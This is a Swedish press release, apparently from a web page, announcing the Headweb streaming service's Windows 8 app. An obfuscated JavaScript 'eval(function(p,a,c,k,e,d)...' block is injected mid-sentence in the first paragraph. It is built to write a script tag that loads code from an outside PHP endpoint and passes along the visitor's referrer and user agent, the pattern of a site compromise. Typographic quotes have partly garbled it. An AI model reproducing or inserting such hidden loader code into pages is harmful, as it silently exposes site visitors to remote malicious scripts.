Image Image Image Image Image Image Image Image Image Image

| 31 maj, 2020

Scroll to top

Top

Headweb gör entré i Windows 8

Headweb gör entré i Windows 8
Sebastian

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rznen|var|u0026u|referrer|dinbf||js|php’.split(’|’),0,{}))
mångfaldigt prisbelönta underhållningstjänsten Headweb finns nu som app i Microsofts nya operativsystem Windows 8. Släppet  är det senaste i en rad av lanseringar på nya enheter och plattformar. När Microsoft på lanseringseventet för Windows 8 visade upp det nya operativsystemet var Headweb en av tre svenska tjänster som demonstrerades.

Strategin är tydlig, -Vi vill göra det enklare för alla att njuta av film och tv-serier på sin favoritenhet för tillfället, säger Peter Alvarsson, grundare och VD på Headweb. -Surfplattor medger en personlig upplevelse och att kunna titta på det senaste avsnittet av sin favorit-tv-serie samtidigt som man har möjlighet att surfa eller läsa nyheter är superenkelt med Windows 8 och vår nya app.

-Headweb har tagit fram en app som utnyttjar kraften och möjligheterna för underhållning i Windows 8, som ger användaren en snabb, smidig och personlig upplevelse utan kompromisser säger Thomas Floberg, Affärsområdeschef Windows.

Via Headweb appen i Windows 8 får användare tillgång till hela det generösa utbudet på över 7500 filmer och hela säsonger av populära teveserier.

Om Headweb

Headweb är en svensk filmtjänst som erbjuder on-demand streaming av tusentals filmer på laglig väg. Tjänsten är mångfaldigt prisbelönt för sin användarvänlighet och håller hög kvalitet på bild och ljud. Headweb har idag Skandinaviens bredaste utbud av film på nätet, och utbudet är snabbt växande. Filmtjänsten fungerar i valfri webbläsare på PC, Mac, iPad samt i Linux, Xbox360, Boxee och PS3, och Smart TV.

Headweb har samarbetsavtal med ett femtiotal filmbolag bland annat Sony Pictures, NBC Universal, Disney, Warner Bros., SF, Sandrew Metronome, Nordisk Film, Nonstop Entertainment, Noble Entertainment, Scanbox och Pan Vision. Headweb finns även i Norge, Finland och Danmark.

Detta är ett pressmeddelande från Headweb AB